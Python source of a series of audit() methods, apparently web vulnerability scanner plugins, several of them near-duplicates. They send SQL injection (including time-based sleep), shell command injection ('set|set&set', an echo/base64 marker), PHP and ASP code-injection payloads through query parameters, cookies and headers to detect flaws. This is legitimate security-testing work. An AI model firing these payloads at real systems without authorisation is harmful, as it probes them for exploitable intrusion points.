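    def audit(self):
        """Probe query parameters for PHP ``array given`` type-confusion warnings.

        One parameter at a time is renamed from ``k`` to ``k[]`` so that PHP
        receives an array where a scalar is expected; the reply is then checked
        for the characteristic ``Warning ... array given`` text. The unmodified
        response is checked first in case the page already leaks the warning.

        Only requests that carry a query string and whose path extension is in
        ``acceptedExt`` are examined; keys listed in ``ignoreParams`` are
        skipped. Findings are reported through ``out.success``; nothing is
        returned.
        """
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL
        resp_str = self.response.get_body_str()  # response body (str, auto-decoded)

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if p.query == '':
            return
        exi = os.path.splitext(p.path)[1]
        if exi not in acceptedExt:
            return

        # The original page may already expose the warning.
        if "Warning" in resp_str and "array given" in resp_str:
            out.success(url, self.name)

        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            del data[k]
            data[k + "[]"] = v
            try:
                probe_url = prepare_url(netloc, params=data)
                r = requests.get(probe_url, headers=headers)
            except Exception:
                # Best effort: one failed probe must not abort the remaining
                # parameters. Unlike the former bare ``except`` this no longer
                # swallows KeyboardInterrupt/SystemExit.
                continue
            if "Warning" in r.text and "array given" in r.text:
                out.success(probe_url, self.name)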
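    def audit(self):
        """Numeric-parameter SQL injection check via arithmetic equivalence.

        For every numeric GET parameter ``v`` two variants are requested:
        ``v+N`` (expected to change the page if the value reaches an SQL
        expression) and ``v+N-N`` (expected to render the original page again).
        A parameter is reported when the first variant is not ``fuzzy_equal``
        to the original response at 0.97 while the second one is at 0.8.
        Probe URLs are de-duplicated through ``Share``.

        Only GET requests with a query string and an extension listed in
        ``acceptedExt`` are processed; keys in ``ignoreParams`` are skipped.
        Findings go to ``out.success``; nothing is returned.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL
        resp_str = self.response.get_body_str()  # response body (str, auto-decoded)

        if method != 'GET':
            return

        # Raw string: ``\d``/``\.`` are invalid escapes in a normal literal
        # (SyntaxWarning on Python 3.12+); compiled once, used per parameter.
        numeric_re = re.compile(r'^-?\d+(\.\d+)?$')

        # Only the current URL is examined; the loop is kept so that more
        # links can be collected from the page source later.
        links = [url]
        for link in set(links):
            # only accept the configured extensions
            p = urlparse(link)
            if p.query == '':
                continue
            exi = os.path.splitext(p.path)[1]
            if exi not in acceptedExt:
                continue
            params = dict()
            for i in p.query.split("&"):
                try:
                    key, value = i.split("=")
                    params[key] = value
                except ValueError:
                    # ``a`` or ``a=b=c``: not a simple pair, skip it.
                    pass
            netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path)

            for k, v in params.items():
                if k.lower() in ignoreParams:
                    continue
                if not numeric_re.search(v):
                    continue
                data = copy.deepcopy(params)
                # Decision:
                # 1. v+N must NOT look like the original page
                # 2. v+N-N must look like the original page
                payload1 = "{0}+{1}".format(v, random.randint(10, 100))
                data[k] = payload1
                url1 = prepare_url(netloc, params=data)
                if Share.in_url(url1):
                    continue
                Share.add_url(url1)
                r = requests.get(url1, headers=headers)
                html1 = r.text
                if fuzzy_equal(resp_str, html1, 0.97):
                    continue
                payload2 = "{0}+{1}-{1}".format(v, random.randint(10, 100))
                data[k] = payload2
                r2 = requests.get(netloc, params=data, headers=headers)
                html2 = r2.text
                if fuzzy_equal(resp_str, html2, 0.8):
                    msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(
                        k=k, v=v, v1=payload1, v2=payload2)
                    out.success(link, self.name, payload=k, condition=msg)
                    break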
    def audit(self):
        """Boolean-based SQL injection check for GET query parameters.

        For each parameter and each quoting template in ``sql_flag`` the
        original value is extended once with a tautology (two identical random
        strings) and once with a contradiction (two different random strings).
        A hit is reported when the tautology page stays close to the original
        (``GetRatio`` >= 0.88) while the contradiction page drifts away from it
        (``GetRatio`` < 0.78). Findings go to ``out.success`` with both raw
        responses; nothing is returned.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL

        resp_data = self.response.get_body_data()  # response body (bytes)
        resp_str = self.response.get_body_str()  # response body (str, auto-decoded)
        resp_headers = self.response.get_headers()  # response headers (dict)

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if method != 'GET':
            return
        if p.query == '':
            return
        if os.path.splitext(p.path)[1] not in acceptedExt:
            return

        sql_flag = [
            "/**/and'{0}'='{1}'",
            "'and'{0}'='{1}",
            '"and"{0}"="{1}',
        ]
        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            for flag in sql_flag:
                # "true" variant: both sides of the comparison are equal
                rand_str = random_str(2)
                payload1 = v + flag.format(rand_str, rand_str)
                data[k] = payload1
                url1 = prepare_url(netloc, params=data)
                r = requests.get(url1, headers=headers)
                similarity_true = GetRatio(resp_str, r.text)
                if similarity_true < 0.88:
                    continue

                # "false" variant: two independent random strings
                payload2 = v + flag.format(random_str(2), random_str(2))
                data[k] = payload2
                r2 = requests.get(netloc, params=data, headers=headers)
                similarity_false = GetRatio(resp_str, r2.text)
                if similarity_false < 0.78:
                    msg = "{k}:{v} === {k}:{v1} and {k}:{v} !== {k}:{v2}".format(
                        k=k, v=v, v1=payload1, v2=payload2)
                    out.success(url,
                                self.name,
                                payload=k,
                                condition=msg,
                                raw=[r.raw, r2.raw])
                    break
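    def audit(self):
        """Error-based SQL injection check on cookie values and GET parameters.

        ``sql_flag`` (a short quote/paren mix) is appended to one cookie value
        or query parameter at a time and the reply is matched against the DBMS
        error signatures from ``Get_sql_errors``. The first matching signature
        per injection point is reported via ``out.success`` together with the
        raw response. Nothing is returned.

        Cookies are tested for every method; query parameters only for GET
        requests that carry a query string and an ``acceptedExt`` extension.
        ``ignoreParams`` keys are skipped.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        # ``\\(`` keeps the literal backslash that the old ``\(`` produced
        # only as an invalid escape (a SyntaxWarning on Python 3.12+).
        sql_flag = '鎈\'"\\('

        # cookie
        if headers and "cookie" in headers:
            cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE)
            # Work on a copy: the parameter probes below must still send the
            # original cookie header instead of a silently stripped one.
            tmp_headers = copy.deepcopy(headers)
            del tmp_headers["cookie"]
            if cookies:
                for k, v in cookies.items():
                    cookie = copy.deepcopy(cookies)
                    cookie[k] = v + sql_flag
                    # ``headers=`` must be a keyword: passed positionally it
                    # would have been taken as ``params`` by ``requests.get``.
                    # NOTE(review): ``cookies=`` receives a urlencoded string
                    # rather than a dict; confirm this is what the installed
                    # ``requests`` version accepts.
                    r = requests.get(url,
                                     headers=tmp_headers,
                                     cookies=urlencode(cookie))
                    for sql_regex, dbms_type in Get_sql_errors():
                        match = sql_regex.search(r.text)
                        if match:
                            out.success(url,
                                        self.name,
                                        payload="cookie: {}={}".format(
                                            k, cookie[k]),
                                        dbms_type=dbms_type,
                                        raw=r.raw)
                            break

        if method != 'GET':
            return
        if p.query == '':
            return
        exi = os.path.splitext(p.path)[1]
        if exi not in acceptedExt:
            return

        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            data[k] = v + sql_flag
            url1 = prepare_url(netloc, params=data)
            r = requests.get(url1, headers=headers)
            html = r.text
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if match:
                    out.success(url,
                                self.name,
                                payload="{}={}".format(k, data[k]),
                                dbms_type=dbms_type,
                                raw=r.raw)
                    break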
    def audit(self):
        """Time-based SQL injection check for GET query parameters.

        Every parameter is requested twice per template in ``sql_flag``: once
        with ``sleep(0)`` and once with ``sleep(2)``. If the second request
        takes more than 1.5 s longer than the first, the parameter is reported
        via ``out.success`` with both timings and the remaining templates for
        it are skipped. Only GET requests with a query string and an
        ``acceptedExt`` extension are examined; ``ignoreParams`` keys are
        skipped. Nothing is returned.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL

        resp_data = self.response.get_body_data()  # response body (bytes)
        resp_str = self.response.get_body_str()  # response body (str, auto-decoded)
        resp_headers = self.response.get_headers()  # response headers (dict)

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if method != 'GET':
            return
        if p.query == '':
            return
        if os.path.splitext(p.path)[1] not in acceptedExt:
            return

        sql_flag = [
            "'and(select+sleep({time})union/**/select+1)='",
            '"and(select+sleep({time})union/**/select+1)="',
            '/**/and(select+sleep({time})union/**/select+1)'
        ]
        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            for flag in sql_flag:
                # baseline request: sleep(0)
                payload1 = flag.format(time=0)
                data[k] = v + payload1
                url1 = prepare_url(netloc, params=data)
                started = time.time()
                r = requests.get(url1, headers=headers)
                body1 = r.text  # read the body before stopping the clock
                elapsed = time.time() - started

                # delayed request: sleep(2)
                payload2 = flag.format(time=2)
                data[k] = v + payload2
                started = time.time()
                r2 = requests.get(netloc, params=data, headers=headers)
                body2 = r2.text  # read the body before stopping the clock
                elapsed2 = time.time() - started

                if elapsed2 - elapsed > 1.5:
                    msg = " {k}:{v1} 耗时 {time1}s; {k}:{v2} 耗时 {time2}s".format(
                        k=k,
                        v1=payload1,
                        v2=payload2,
                        time1=elapsed,
                        time2=elapsed2)
                    out.success(url, self.name, payload=k, condition=msg)
                    break
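    def audit(self):
        """Command injection check for GET query parameters.

        Each parameter is replaced by, or suffixed (``;``-separated) with, one
        of the probe commands in ``url_flag``; the response is then searched
        for the regular expressions associated with that probe (environment
        dumps for ``set``, a fixed marker for the ``echo`` probe). Matches are
        reported through ``out.success`` with the raw response. Only GET
        requests with a query string and an ``acceptedExt`` extension are
        examined; ``ignoreParams`` keys are skipped. Nothing is returned.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if method != 'GET':
            return
        if p.query == '':
            return
        exi = os.path.splitext(p.path)[1]
        if exi not in acceptedExt:
            return

        # Raw strings: ``\s``/``\S`` are invalid escapes in a normal literal
        # (SyntaxWarning on Python 3.12+); the patterns seen by ``re`` are
        # unchanged (``\x3d`` and ``\n`` are regex escapes for ``=`` and newline).
        # NOTE(review): the ``echo`` marker is static. The previous code called
        # ``.format(randint)`` on a template with no placeholder, so the random
        # number never reached the payload; that dead code is dropped here.
        url_flag = {
            "set|set&set": [
                r'Path=[\s\S]*?PWD=',
                r'Path=[\s\S]*?PATHEXT=',
                r'Path=[\s\S]*?SHELL=',
                r'Path\x3d[\s\S]*?PWD\x3d',
                r'Path\x3d[\s\S]*?PATHEXT\x3d',
                r'Path\x3d[\s\S]*?SHELL\x3d',
                r'SERVER_SIGNATURE=[\s\S]*?SERVER_SOFTWARE=',
                r'SERVER_SIGNATURE\x3d[\s\S]*?SERVER_SOFTWARE\x3d',
                r'Non-authoritative\sanswer:\s+Name:\s*',
                r'Server:\s*.*?\nAddress:\s*'
            ],
            "echo `echo 6162983|base64`6162983": [
                "NjE2Mjk4Mwo=6162983"
            ]
        }
        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            for spli in ['', ';']:
                for flag, re_list in url_flag.items():
                    # '' replaces the value outright; ';' appends the probe
                    # after the original value.
                    if spli == "":
                        data[k] = flag
                    else:
                        data[k] = v + spli + flag
                    url1 = prepare_url(netloc, params=data)
                    r = requests.get(url1, headers=headers)
                    html1 = r.text
                    for rule in re_list:
                        if re.search(rule, html1, re.I | re.S | re.M):
                            out.success(url, self.name, payload="{}:{}".format(k, data[k]), raw=r.raw)
                            break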
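    def audit(self):
        """PHP code injection check for GET query parameters.

        A random integer is hashed with ``md5``; each payload in ``payloads``
        asks the server to print ``md5(<int>)``. If the digest appears in the
        response, or the response contains a PHP ``Parse error`` message, the
        parameter is reported through ``out.success`` and the remaining
        payloads for it are skipped. Only GET requests with a query string and
        an ``acceptedExt`` extension are examined; ``ignoreParams`` keys are
        skipped. Nothing is returned.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if method != 'GET':
            return
        if p.query == '':
            return
        exi = os.path.splitext(p.path)[1]
        if exi not in acceptedExt:
            return

        # Raw string: ``\s`` is an invalid escape in a normal literal
        # (SyntaxWarning on Python 3.12+); compiled once, used per response.
        parse_error_re = re.compile(r'Parse error: syntax error,.*?\sin\s',
                                    re.I | re.S | re.M)
        randint = random.randint(1, 256)
        verify_result = md5(str(randint).encode())
        payloads = [
            "print(md5({}));", ";print(md5({}));", "';print(md5({}));$a='",
            "\";print(md5({}));$a=\"", "${{@print(md5({}))}}",
            "${{@print(md5({}))}}\\"
        ]

        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            for payload in payloads:
                # Payloads starting with ``p`` replace the value; the others
                # are appended to the original value.
                if payload[0] == "p":
                    data[k] = payload.format(randint)
                else:
                    data[k] = v + payload.format(randint)
                url1 = prepare_url(netloc, params=data)
                r = requests.get(url1, headers=headers)
                html1 = r.text
                # Either signal reports the same finding and stops this key.
                if verify_result in html1 or parse_error_re.search(html1):
                    out.success(url,
                                self.name,
                                payload="{}:{}".format(k, data[k]))
                    break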
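    def audit(self):
        """Error-based SQL injection check over the current URL and page links.

        Links are collected from the response body with ``get_links`` and the
        current URL is added; each link with a query string and an
        ``acceptedExt`` extension is split into query parameters. For every
        parameter not in ``ignoreParams`` the value is suffixed with
        ``sql_flag`` (a quote/paren mix) and the reply is matched against the
        DBMS error signatures from ``Get_sql_errors``. Probe URLs are
        de-duplicated through ``Share``. Only GET requests are processed.
        Findings go to ``out.success``; nothing is returned.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL
        resp_str = self.response.get_body_str()  # response body (str, auto-decoded)

        if method != 'GET':
            return

        # ``\\(`` keeps the literal backslash that the old ``\(`` produced
        # only as an invalid escape (a SyntaxWarning on Python 3.12+).
        # Hoisted: the marker is the same for every link.
        sql_flag = '鎈\'"\\('

        # collect more links from the page source
        links = get_links(resp_str, url, True)
        links.append(url)
        for link in set(links):
            # only accept the configured extensions
            p = urlparse(link)
            if p.query == '':
                continue
            exi = os.path.splitext(p.path)[1]
            if exi not in acceptedExt:
                continue
            params = dict()
            for i in p.query.split("&"):
                try:
                    key, value = i.split("=")
                    params[key] = value
                except ValueError:
                    # ``a`` or ``a=b=c``: not a simple pair, skip it.
                    pass
            netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path)

            for k, v in params.items():
                if k.lower() in ignoreParams:
                    continue
                data = copy.deepcopy(params)
                data[k] = v + sql_flag
                url1 = prepare_url(netloc, params=data)
                if Share.in_url(url1):
                    continue
                Share.add_url(url1)
                r = requests.get(url1, headers=headers)
                html = r.text
                for sql_regex, dbms_type in Get_sql_errors():
                    match = sql_regex.search(html)
                    if match:
                        out.success(link,
                                    self.name,
                                    payload="{}={}".format(k, data[k]))
                        break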
    def audit(self):
        """ASP/VBScript code injection check for GET query parameters.

        Two random integers are multiplied locally; each payload asks the
        server to ``response.write`` the same product. If the product shows up
        in the response body the parameter is reported through ``out.success``
        with the raw response and the remaining payloads for it are skipped.
        Only GET requests with a query string and an ``acceptedExt`` extension
        are examined; ``ignoreParams`` keys are skipped. Nothing is returned.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL

        resp_data = self.response.get_body_data()  # response body (bytes)
        resp_str = self.response.get_body_str()  # response body (str, auto-decoded)
        resp_headers = self.response.get_headers()  # response headers (dict)

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if method != 'GET':
            return
        if p.query == '':
            return
        if os.path.splitext(p.path)[1] not in acceptedExt:
            return

        factor_a = random.randint(10000, 90000)
        factor_b = random.randint(10000, 90000)
        expected = str(factor_a * factor_b)

        payloads = [
            'response.write({}*{})'.format(factor_a, factor_b),
            '\'+response.write({}*{})+\''.format(factor_a, factor_b),
            '"response.write({}*{})+"'.format(factor_a, factor_b),
        ]

        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            for payload in payloads:
                # NOTE(review): ``payload[0]`` is a single character and can
                # never equal ``""``, so the first branch is dead and every
                # payload is appended to the original value. Kept as-is to
                # preserve behaviour; confirm which leading character was
                # meant before changing it.
                if payload[0] == "":
                    data[k] = payload
                else:
                    data[k] = v + payload
                url1 = prepare_url(netloc, params=data)
                r = requests.get(url1, headers=headers)
                if expected in r.text:
                    out.success(url,
                                self.name,
                                payload="{}:{}".format(k, data[k]),
                                raw=r.raw)
                    break
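    def audit(self):
        """Numeric-parameter SQL injection check via arithmetic equivalence.

        For each numeric GET parameter ``v`` two variants are requested:
        ``v+N``, expected to change the page if the value is evaluated as an
        SQL expression, and ``v+N-N``, expected to reproduce the original
        page. The parameter is reported through ``out.success`` when the first
        variant is not ``fuzzy_equal`` to the original at 0.87 while the second
        is at 0.8. Only GET requests with a query string and an ``acceptedExt``
        extension are examined; ``ignoreParams`` keys are skipped. Nothing is
        returned.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL
        resp_str = self.response.get_body_str()  # response body (str, auto-decoded)

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if method != 'GET':
            return
        if p.query == '':
            return
        exi = os.path.splitext(p.path)[1]
        if exi not in acceptedExt:
            return

        # Raw string: ``\d``/``\.`` are invalid escapes in a normal literal
        # (SyntaxWarning on Python 3.12+); compiled once outside the loop.
        numeric_re = re.compile(r'^-?\d+(\.\d+)?$')

        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            if not numeric_re.search(v):
                continue
            data = copy.deepcopy(params)
            # Decision:
            # 1. v+N must NOT look like the original page
            # 2. v+N-N must look like the original page
            payload1 = "{0}+{1}".format(v, random.randint(10, 100))
            data[k] = payload1
            url1 = prepare_url(netloc, params=data)
            r = requests.get(url1, headers=headers)
            html1 = r.text
            if fuzzy_equal(resp_str, html1, 0.87):
                continue
            payload2 = "{0}+{1}-{1}".format(v, random.randint(10, 100))
            data[k] = payload2
            r2 = requests.get(netloc, params=data, headers=headers)
            html2 = r2.text
            if fuzzy_equal(resp_str, html2, 0.8):
                msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(
                    k=k, v=v, v1=payload1, v2=payload2)
                out.success(url, self.name, payload=k, condition=msg)
                break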
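    def audit(self):
        """Probe PHP endpoints for ``array given`` warnings by turning params into arrays.

        Only paths whose basename ends in ``.php`` or has no extension at all
        are examined. The unmodified response is checked first; then each query
        parameter ``k`` is renamed to ``k[]`` in turn so that PHP receives an
        array where a scalar is expected, and the reply is checked for the
        ``Warning ... array given`` text. Probe URLs are de-duplicated through
        ``Share``; keys in ``ignoreParams`` are skipped. Findings go to
        ``out.success``; nothing is returned.
        """
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL
        resp_str = self.response.get_body_str()  # response body (str, auto-decoded)

        p = urlparse(url)
        # accept paths that end in .php or carry no extension
        basepath = os.path.basename(p.path)
        if "." in basepath and ".php" not in basepath:
            return

        # The original page may already expose the warning.
        if "Warning" in resp_str and "array given" in resp_str:
            out.success(url, self.name)

        params = dict()
        for i in p.query.split("&"):
            try:
                key, value = i.split("=")
                params[key] = value
            except ValueError:
                # ``a`` or ``a=b=c``: not a simple pair, skip it.
                pass
        netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path)
        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            del data[k]
            data[k + "[]"] = v
            try:
                probe_url = prepare_url(netloc, params=data)
                if Share.in_url(probe_url):
                    continue
                Share.add_url(probe_url)
                r = requests.get(probe_url, headers=headers)
            except Exception:
                # Best effort: one failed probe must not abort the remaining
                # parameters. Unlike the former bare ``except`` this no longer
                # swallows KeyboardInterrupt/SystemExit.
                continue
            if "Warning" in r.text and "array given" in r.text:
                out.success(probe_url, self.name)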
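    def audit(self):
        """Error-based SQL injection check for GET query parameters.

        ``sql_flag`` (a quote/paren mix) is appended to one parameter at a
        time and the reply is matched against the DBMS error signatures from
        ``Get_sql_errors``; the first match per parameter is reported through
        ``out.success``. Only GET requests with a query string and an
        ``acceptedExt`` extension are examined; ``ignoreParams`` keys are
        skipped. Nothing is returned.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        if method != 'GET':
            return
        if p.query == '':
            return
        exi = os.path.splitext(p.path)[1]
        if exi not in acceptedExt:
            return

        # ``\\(`` keeps the literal backslash that the old ``\(`` produced
        # only as an invalid escape (a SyntaxWarning on Python 3.12+).
        sql_flag = '鎈\'"\\('
        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            data[k] = v + sql_flag
            url1 = prepare_url(netloc, params=data)
            r = requests.get(url1, headers=headers)
            html = r.text
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if match:
                    out.success(url,
                                self.name,
                                payload="{}={}".format(k, data[k]))
                    break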
    def audit(self):
        """Boolean-based SQL injection check over the current URL's parameters.

        The URL (currently the only entry in ``links``) is split into query
        parameters; each one not in ``ignoreParams`` is extended with a
        tautology template (two identical random strings) and then with a
        contradiction (two different random strings). A hit is reported via
        ``out.success`` when the tautology page stays similar to the original
        (``GetRatio`` >= 0.88) but the contradiction page does not
        (``GetRatio`` < 0.68). Probe URLs are de-duplicated through ``Share``.
        Only GET requests with a query string and an ``acceptedExt`` extension
        are examined. Nothing is returned.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL
        data = self.requests.get_body_data().decode()  # POST data

        resp_data = self.response.get_body_data()  # response body (bytes)
        resp_str = self.response.get_body_str()  # response body (str, auto-decoded)
        resp_headers = self.response.get_headers()  # response headers (dict)

        if method != 'GET':
            return

        # collect more links from the page source (only the URL itself for now)
        links = [url]
        for link in set(links):
            # only accept the configured extensions
            p = urlparse(link)
            if p.query == '':
                continue
            if os.path.splitext(p.path)[1] not in acceptedExt:
                continue
            params = dict()
            for pair in p.query.split("&"):
                try:
                    key, value = pair.split("=")
                except ValueError:
                    continue
                params[key] = value
            netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path)

            sql_flag = [
                "'and'{0}'='{1}",
                '"and"{0}"="{1}'
            ]
            for k, v in params.items():
                if k.lower() in ignoreParams:
                    continue
                data = copy.deepcopy(params)
                for flag in sql_flag:
                    # true page: both sides of the comparison match
                    rand_str = random_str(2)
                    payload1 = flag.format(rand_str, rand_str)
                    data[k] = v + payload1
                    url1 = prepare_url(netloc, params=data)
                    if Share.in_url(url1):
                        continue
                    Share.add_url(url1)
                    r = requests.get(url1, headers=headers)
                    similarity_true = GetRatio(resp_str, r.text)
                    if similarity_true < 0.88:  # ad-hoc similarity threshold
                        continue

                    # false page: two independent random strings
                    payload2 = flag.format(random_str(2), random_str(2))
                    data[k] = v + payload2
                    r2 = requests.get(netloc, params=data, headers=headers)
                    similarity_false = GetRatio(resp_str, r2.text)
                    if similarity_false < 0.68:  # ad-hoc similarity threshold
                        msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(
                            k=k, v=v, v1=payload1, v2=payload2)
                        out.success(link, self.name, payload=k, condition=msg)
                        break
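    def audit(self):
        """Error-based SQL injection check on cookies, GET parameters and headers.

        ``sql_flag`` (a quote/paren mix) is appended to one injection point at
        a time — each cookie value, each query parameter, and finally a set of
        request headers (User-Agent, referer, x-forwarded-for, via) — and the
        reply is matched against the DBMS error signatures from
        ``Get_sql_errors``. Cookie and header probes whose reply has the same
        length as the original response are not inspected further. The first
        signature per injection point is reported through ``out.success``;
        nothing is returned.

        The path extension must be in ``acceptedExt``; cookies are tested for
        any method, query parameters and headers only for GET requests with a
        query string. ``ignoreParams`` keys are skipped.
        """
        method = self.requests.command  # request method, GET or POST
        headers = self.requests.get_headers()  # request headers (dict)
        url = self.build_url()  # full request URL
        resp_str = self.response.get_body_str()  # response body (str, auto-decoded)

        p = self.requests.urlparse
        params = self.requests.params
        netloc = self.requests.netloc

        exi = os.path.splitext(p.path)[1]
        if exi not in acceptedExt:
            return

        origin_len = len(resp_str)
        # ``\\(`` keeps the literal backslash that the old ``\(`` produced
        # only as an invalid escape (a SyntaxWarning on Python 3.12+).
        sql_flag = '鎈\'"\\('

        # cookie
        if headers and "cookie" in headers:
            cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE)
            # Probe on a copy so the parameter and header tests below still
            # send the original cookie header.
            tmp_headers = copy.deepcopy(headers)
            del tmp_headers["cookie"]
            if cookies:
                for k, v in cookies.items():
                    cookie = copy.deepcopy(cookies)
                    cookie[k] = v + sql_flag
                    # NOTE(review): ``cookies=`` receives a urlencoded string
                    # rather than a dict; confirm this is what the installed
                    # ``requests`` version accepts.
                    r = requests.get(url,
                                     headers=tmp_headers,
                                     cookies=urlencode(cookie))
                    # Same body length as the original: treat as unchanged.
                    if origin_len == len(r.text):
                        continue
                    for sql_regex, dbms_type in Get_sql_errors():
                        match = sql_regex.search(r.text)
                        if match:
                            out.success(url,
                                        self.name,
                                        payload="cookie: {}={}".format(
                                            k, cookie[k]),
                                        dbms_type=dbms_type,
                                        raw=r.raw)
                            break

        if method != 'GET':
            return
        if p.query == '':
            return
        # The extension was already validated above; no second check needed.

        for k, v in params.items():
            if k.lower() in ignoreParams:
                continue
            data = copy.deepcopy(params)
            data[k] = v + sql_flag
            url1 = prepare_url(netloc, params=data)
            r = requests.get(url1, headers=headers)
            html = r.text
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if match:
                    out.success(url,
                                self.name,
                                payload="{}={}".format(k, data[k]),
                                dbms_type=dbms_type,
                                raw=r.raw,
                                errinfo=match.group())
                    break

        # test header
        if headers:
            header_flag = '\'"\\('
            new_headers = {
                "User-Agent":
                headers.get("User-Agent", "") + header_flag,
                "referer":
                headers.get("referer", url) + header_flag,
                "x-forwarded-for":
                headers.get("x-forwarded-for", "127.0.0.1") + header_flag,
                "via":
                headers.get("via", "") + header_flag
            }
            r = requests.get(url, headers=new_headers)
            html = r.text
            # Same body length as the original: treat as unchanged.
            if origin_len == len(html):
                return
            for sql_regex, dbms_type in Get_sql_errors():
                match = sql_regex.search(html)
                if match:
                    out.success(url,
                                self.name,
                                type="header inject",
                                dbms_type=dbms_type,
                                raw=r.raw,
                                errinfo=match.group())
                    break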